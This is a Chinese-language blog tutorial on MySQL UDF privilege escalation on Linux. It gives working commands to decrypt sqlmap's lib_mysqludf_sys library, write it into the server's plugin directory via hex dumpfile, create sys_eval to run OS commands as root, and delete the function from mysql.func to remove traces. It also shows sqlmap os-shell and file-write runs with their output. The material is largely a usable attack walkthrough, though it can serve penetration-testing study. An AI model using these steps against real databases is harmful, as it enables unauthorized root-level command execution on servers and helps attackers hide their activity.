linux环境下的MySQL UDF提权

linux环境下的MySQL UDF提权

##1. 背景介绍

###UDF

UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。

###利用前提

  • mysql允许导入导出文件
  • 高权限用户启动,如root。该账号需要有对数据库mysql的insert和delete权限,其实是操作里面的func表,所以func表也必须存在。
  • 未开启‑‑skip‑grant‑tables。开启的情况下,UDF不会被加载,默认不开启。

实验环境

手工启动mysql,指定root启动:mysqld_safe --user=root。默认是mysql用户启动。

##2. 未GetShell的情况

适用情况:目标主机开启MySQL远程连接,并且已经获得MySQL数据库连接的用户名和密码信息

###2.1 手工提权

判断前提条件
  1. 查看是否允许导入导出文件

    mysql> show variables like "%secure_file_priv%";
    +------------------+-------+
    | Variable_name    | Value |
    +------------------+-------+
    | secure_file_priv |       |
    +------------------+-------+
    1 row in set (0.01 sec)
    

    这个参数(https://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_secure_file_priv)在MySQL数据库的安装目录的 my.ini 文件中配置,也可以作为启动参数。

    secure_file_priv是用来限制load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限。

    当 secure_file_priv 的值为 null ,表示限制 mysqld 不允许导入|导出,此时无法提权

    当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权

    当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

  2. 查看是否高权限

    mysql> select * from mysql.user where user = substring_index(user(), '@', 1) ;
    
  3. 查看plugin的值

    mysql> select host,user,plugin from mysql.user where user = substring_index(user(),'@',1);
    +-----------+------+-----------------------+
    | host      | user | plugin                |
    +-----------+------+-----------------------+
    | localhost | root | mysql_native_password |
    +-----------+------+-----------------------+
    1 row in set (0.02 sec)
    

    plugin值表示mysql用户的认证方式。当 plugin 的值为空时不可提权,为 mysql_native_password 时可通过账户连接提权。默认为mysql_native_password。另外,mysql用户还需对此plugin目录具有写权限。

上传udf库文件
  1. 获取plugin路径

    mysql> show variables like "%plugin%";
    +-------------------------------+--------------------------------------------+
    | Variable_name | Value |
    +-------------------------------+--------------------------------------------+
    | default_authentication_plugin | mysql_native_password |
    | plugin_dir | /usr/local/Cellar/mysql/5.7.22/lib/plugin/ |
    +-------------------------------+--------------------------------------------+
    2 rows in set (0.02 sec)

  2. 获取服务器版本信息

    mysql> show variables like 'version_compile_%';
    +-------------------------+----------+
    | Variable_name | Value |
    +-------------------------+----------+
    | version_compile_machine | x86_64 |
    | version_compile_os | osx10.13 |
    +-------------------------+----------+
    2 rows in set (0.01 sec)

  3. 准备udf库文件

需要选择对应的版本,否则会报错。

  • 从sqlmap获取

    sqlmap中有现成的udf文件。分别是32位和64位的。这里选择sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_

    不过这里的so是异或过的,需要执行以下命令解密:

    cd sqlmap/extra/cloak
    
    python3 cloak.py -d -i /security/ctf/tools_bar/4_注入攻击/SQLI/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
    

    此时会在相同目录生成解密后的lib_mysqludf_sys.so。

  • 从metasploit中获取

    在kali的/usr/share/metasploit-framework/data/exploits/mysql目录下找到相应的库即可。

    这个库和sqlmap解密后的一模一样。

  • 自行编译

​ 下载lib_mysqludf_sys

  1. 上传udf库文件

    1. 获取库文件的16进制

      ```
      

    这里的mysql交互命令行是本地的,随意开一个就行

    mysql> select hex(load_file('/security/ctf/tools_bar/4_注入攻击/SQLI/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';

    Query OK, 1 row affected (0.03 sec)

    ```
    2. 上传库文件

    # 这里的mysql交互命令行是目标数据库,7F454C46020打头的参数即/tmp/udf.txt的内容(注意去掉最后的换行)
    mysql> select unhex('7F454C46020...') into dumpfile '/usr/local/Cellar/mysql/5.7.22/lib/plugin/mysqludf.so';
    Query OK, 1 row affected (0.04 sec)
    

    上传库文件也可以通过临时表中转的方式,此处略。

创建函数
  1. 先在本地查看有哪些函数可用

    nm -D lib_mysqludf_sys.so
    w _Jv_RegisterClasses
    0000000000201788 A __bss_start
    w __cxa_finalize
    w gmon_start
    0000000000201788 A _edata
    0000000000201798 A _end
    0000000000001178 T _fini
    0000000000000ba0 T _init
    U fgets
    U fork
    U free
    U getenv
    000000000000101a T lib_mysqludf_sys_info
    0000000000000da4 T lib_mysqludf_sys_info_deinit
    0000000000001047 T lib_mysqludf_sys_info_init
    U malloc
    U mmap
    U pclose
    U popen
    U realloc
    U setenv
    U strcpy
    U strncpy
    0000000000000dac T sys_bineval
    0000000000000dab T sys_bineval_deinit
    0000000000000da8 T sys_bineval_init
    0000000000000e46 T sys_eval
    0000000000000da7 T sys_eval_deinit
    0000000000000f2e T sys_eval_init
    0000000000001066 T sys_exec
    0000000000000da6 T sys_exec_deinit
    0000000000000f57 T sys_exec_init
    00000000000010f7 T sys_get
    0000000000000da5 T sys_get_deinit
    0000000000000fea T sys_get_init
    000000000000107a T sys_set
    00000000000010e8 T sys_set_deinit
    0000000000000f80 T sys_set_init
    U sysconf
    U system
    U waitpid

  2. 创建sys_eval函数

    mysql> create function sys_eval returns string soname "mysqludf.so";
    Query OK, 0 rows affected (0.03 sec)
    mysql>

  3. 函数操作

    调用函数

    mysql> select sys_eval('whoami');
    +--------------------+
    | sys_eval('whoami') |
    +--------------------+
    | root |
    +--------------------+
    1 row in set (0.03 sec)

    查看函数

    mysql> select * from mysql.func;
    +----------+-----+-------------+----------+
    | name | ret | dl | type |
    +----------+-----+-------------+----------+
    | sys_eval | 0 | mysqludf.so | function |
    +----------+-----+-------------+----------+
    1 row in set

    删除函数(清除痕迹),如果要删除函数,必须udf文件还存在plugin目录下

    drop function sys_eval;

    delete from mysql.func where name='sys_eval';

2.2 利用sqlmap

####全自动化

sqlmap.py -d "mysql://root:root@172.20.10.9:3306/mysql" --os-shell

...
[11:53:40] [INFO] connection to MySQL server '172.20.10.9:3306' established
[11:53:40] [INFO] testing MySQL
[11:53:40] [INFO] confirming MySQL
[11:53:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:53:40] [INFO] fingerprinting the back-end DBMS operating system
[11:53:40] [INFO] the back-end DBMS operating system is Linux
[11:53:40] [INFO] testing if current user is DBA
[11:53:40] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[11:53:45] [INFO] checking if UDF 'sys_exec' already exist
[11:53:45] [INFO] checking if UDF 'sys_eval' already exist
[11:53:50] [INFO] detecting back-end DBMS version from its banner
[11:53:50] [INFO] the local file '/var/folders/bx/zb9__nb1591g_r8k78p5p0gr0000gn/T/sqlmap_5_qd1_y51533/lib_mysqludf_sysp478pm69.so' and the remote file './libsoxbd.so' have the same size (8040 B)
[11:53:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
[11:53:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[11:53:50] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[11:53:50] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]

No output
os-shell>

没有得到执行结果,查看func表也没有udf记录,未找到原因。

####半自动化

  1. 获取plugin目录

    python3 sqlmap.py -d "mysql://root:@172.20.10.9:3306/mysql" --sql-shell
            ___
           __H__
     ___ ___[']_____ ___ ___  {1.4.2.24#dev}
    |_ -| . [']     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V...       |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 13:21:33 /2020-02-10/
    
    [13:21:34] [INFO] connection to MySQL server '172.20.10.9:3306' established
    [13:21:34] [INFO] testing MySQL
    [13:21:34] [INFO] resumed: [['1']]...
    [13:21:34] [INFO] confirming MySQL
    [13:21:34] [INFO] resumed: [['1']]...
    [13:21:34] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
    [13:21:34] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
    sql-shell> select @@plugin_dir;
    [13:22:06] [INFO] fetching SQL SELECT statement query output: 'select @@plugin_dir'
    select @@plugin_dir [1]:
    [*] /usr/lib/x86_64-linux-gnu/mariadb18/plugin/
    
    sql-shell>
    

    得到plugin目录为/usr/lib/x86_64-linux-gnu/mariadb18/plugin/

  2. 上传lib_mysqludf_sys到plugin目录

    python3 sqlmap.py -d "mysql://root:@172.20.10.9:3306/mysql" --file-write=/Users/simon/Downloads/lib_mysqludf_sys_64.so --file-dest=/usr/lib/x86_64-linux-gnu/mariadb18/plugin/lib_mysqludf_sys_64.so
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.4.2.24#dev}
    |_ -| . ["]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 13:28:35 /2020-02-10/
    
    [13:28:36] [INFO] connection to MySQL server '172.20.10.9:3306' established
    [13:28:36] [INFO] testing MySQL
    [13:28:36] [INFO] resumed: [['1']]...
    [13:28:36] [INFO] confirming MySQL
    [13:28:36] [INFO] resumed: [['1']]...
    [13:28:36] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
    [13:28:36] [INFO] fingerprinting the back-end DBMS operating system
    [13:28:36] [INFO] resumed: [['0']]...
    [13:28:36] [INFO] the back-end DBMS operating system is Linux
    do you want confirmation that the local file '/Users/simon/Downloads/lib_mysqludf_sys_64.so' has been successfully written on the back-end DBMS file system ('/usr/lib/x86_64-linux-gnu/mariadb18/plugin/lib_mysqludf_sys_64.so')? [Y/n]
    
    [13:28:42] [INFO] the local file '/Users/simon/Downloads/lib_mysqludf_sys_64.so' and the remote file '/usr/lib/x86_64-linux-gnu/mariadb18/plugin/lib_mysqludf_sys_64.so' have the same size (8040 B)
    [13:28:42] [INFO] connection to MySQL server '172.20.10.9:3306' closed
    
    [*] ending @ 13:28:42 /2020-02-10/
    
  3. 创建&执行函数

    python3 sqlmap.py -d "mysql://root:@172.20.10.9:3306/mysql" --sql-shell
            ___
           __H__
     ___ ___[,]_____ ___ ___  {1.4.2.24#dev}
    |_ -| . [)]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V...       |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 13:32:23 /2020-02-10/
    
    [13:32:23] [INFO] connection to MySQL server '172.20.10.9:3306' established
    [13:32:23] [INFO] testing MySQL
    [13:32:23] [INFO] resumed: [['1']]...
    [13:32:23] [INFO] confirming MySQL
    [13:32:23] [INFO] resumed: [['1']]...
    [13:32:23] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
    [13:32:23] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
    sql-shell> create function sys_eval returns string soname 'lib_mysqludf_sys_64.so'
    [13:34:56] [INFO] executing SQL data definition statement: 'create function sys_eval returns string soname 'lib_mysqludf_sys_64.so''
    create function sys_eval returns string soname 'lib_mysqludf_sys_64.so': 'NULL'
    sql-shell> select sys_eval('whoami');
    [13:35:59] [INFO] fetching SQL SELECT statement query output: 'select sys_eval('whoami')'
    select sys_eval('whoami') [1]:
    [*] root
    
    sql-shell>
    

    sqlmap中的udf文件提供的函数:

    sys_eval,执行任意命令,并将输出返回。

    sys_exec,执行任意命令,并将退出码返回。

    sys_get,获取一个环境变量。

    sys_set,创建或修改一个环境变量。

    ...

2.3 利用HackMySQL

以前叫Python_FuckMySQL,仅适用于目标系统为windows,故略。

https://github.com/T3st0r-Git/HackMySQL

https://github.com/v5est0r/Python_FuckMySQL

##3. GetShell的情况

适用情况:已经通过一句话木马等GetShell,并且得到了数据库用户名、密码。

###上传含udf提权功能的大马提权

手上的提权木马都是针对windows的,且都是php5。而实验环境是Kali+php7,故未实操。

文章可参考以下:

https://mp.weixin.qq.com/s/URPJPbmRixfWPKFDaX1qFA

http://zone.secevery.com/article/1096

###反弹shell

思路:通过getshell反弹shell后,在反弹回来的shell中连接mysql,然后进行手工提权。

结果:失败,在反弹回来的shell中无法成功连接mysql。

相关推荐
Lionhacker5 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos086 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
mingzhi618 小时前
渗透测试-快速获取目标中存在的漏洞(小白版)
安全·web安全·面试·职场和发展
程序员小予9 小时前
如何成为一名黑客?小白必学的12个基本步骤
计算机网络·安全·网络安全
蜗牛学苑_武汉11 小时前
Wazuh入侵检测系统的安装和基本使用
网络·网络安全
安胜ANSCEN11 小时前
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
网络·安全·web安全·威胁检测·自动化响应
乐茵安全11 小时前
linux基础
linux·运维·服务器·网络·安全·网络安全
如光照14 小时前
Linux与Windows中的流量抓取工具:wireshark与tcpdump
linux·windows·测试工具·网络安全
超栈14 小时前
蓝桥杯-网络安全比赛题目-遗漏的压缩包
前端·网络·sql·安全·web安全·职场和发展·蓝桥杯